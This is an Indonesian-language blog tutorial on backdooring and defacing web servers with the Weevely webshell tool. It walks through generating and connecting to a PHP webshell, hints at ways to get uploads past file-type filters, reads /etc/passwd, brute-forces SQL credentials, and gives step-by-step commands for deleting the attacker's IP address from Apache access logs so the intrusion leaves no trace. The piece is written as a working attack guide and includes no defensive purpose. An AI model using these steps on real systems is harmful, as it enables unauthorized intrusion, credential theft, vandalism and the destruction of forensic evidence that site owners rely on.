Terpopuler

Cara Backdoor dan Deface Web Server Menggunakan Weevely

Weevely merupakan sebuah Webshell Management Tool yang ditulis menggunkakan bahasa pemrograman Phyton. Weevely hanya ini tersedia untuk sistem operasi Linux.

Bagaimana cara melakukan Backdoor dan Deface Web Server Menggunakan Weevely?

Langsung saja ke langkah-langkahnya.

Baca juga,

Instalasi
root@ddos:~# pip install prettytable Mako PyYAML python-dateutil PySocks –upgrade
root@ddos:~# apt-get install g++ python-pip libyaml-dev python-dev

Cara menjalankan Weevely

Backdoor dan Deface Web Server Menggunakan Weevely


Membuat sebuah Backdoor
root@ddos:~# weevely generate ddos ddos.php 
*bd core ddos.php modules utils weevely.py

Anda perlu menggunakan beberapa teknik untuk mengunggah webshell seperti teknik double extension, bypass image type validation, bypass whilelist/blacklist.
Lihat disini

Koneksikan ke Backdoor
root@ddos:/usr/share/weevely# weevely http://192.168.1.8/ddos.php ddos
Backdoor dan Deface Web Server Menggunakan Weevely


Bypass Policy to Read /etc/passwd
www-data@ddos:/etc $ audit_etcpasswd
Backdoor dan Deface Web Server Menggunakan Weevely


Menebak Credential SQL user
Langkah ini merupakan cara menebak kredensial dari beberapa pengguna SQL.
weevely> bruteforce_sql –help
Backdoor dan Deface Web Server Menggunakan Weevely


Pembersihan log
Trik ini untuk adalah cara membersihkan catatan log pada server.

Backdoor dan Deface Web Server Menggunakan Weevely


Disini kita gunakan command system_info untuk mendapatkan Ip yang kita gunakan
www-data@ddos:/var/log $ system_info -info client_ip

Kita gunakan grep command untuk mengkonfirm bahwa Ip yang telah kita dapatkan berada dalam file Log
www-data@ddos:/var/log/apache2 $ cat ‘/var/log/apache2/access.log.1’ |grep “192.168.1.8”
Backdoor dan Deface Web Server Menggunakan Weevely


Kita akan melihat bahwa aktifitas Ip kita telah terecord atau terekam pada Log.
Disini kita akan menggunakan perintah Grep untuk menghapus Ip lalu menyimpannya ke file sementara / temporary file.
www-data@ddos:/var/log/apache2 $ cat ‘/var/log/apache2/access.log.1’ |grep -v “192.168.1.8” > cleaned.log

Silahkan uji apakah Ip telah berhasil kita hapus
www-data@ddos:/var/log/apache2 $ cat ‘/var/log/apache2/access.log.1’ |grep -v “192.168.1.8” > cleaned.log
www-data@ddos:/var/log/apache2 $ cat cleaned.log |grep “192.168.1.8”
www-data@ddos:/var/log/apache2 $ 

Lalu kita ganti file cleaned.log dengan access.log.1
www-data@ddos:/var/log/apache2 $ rm access.log.1
www-data@ddos:/var/log/apache2 $ mv cleaned.log access.log.1

Demo

Silahkan share artikel ini ke

Tips Trik Tutorial Cara Backdoor dan Deface Web Server Menggunakan Weevely

Hi :) Jangan lupa like fanspage facebook ArtikelCara10! Donate kllik ikllan. Mau yang lebih menarik klik - DISINI -

Related Posts

Previous
Next Post »

Jika ada pesan kesan atau sekedar berbasa-basi silahkan untuk berkomentar pada box komentar yang telah kami sediakan.
Komentar bebas tanpa aturan, terbuka untuk semua (termasuk opsi Name/URL).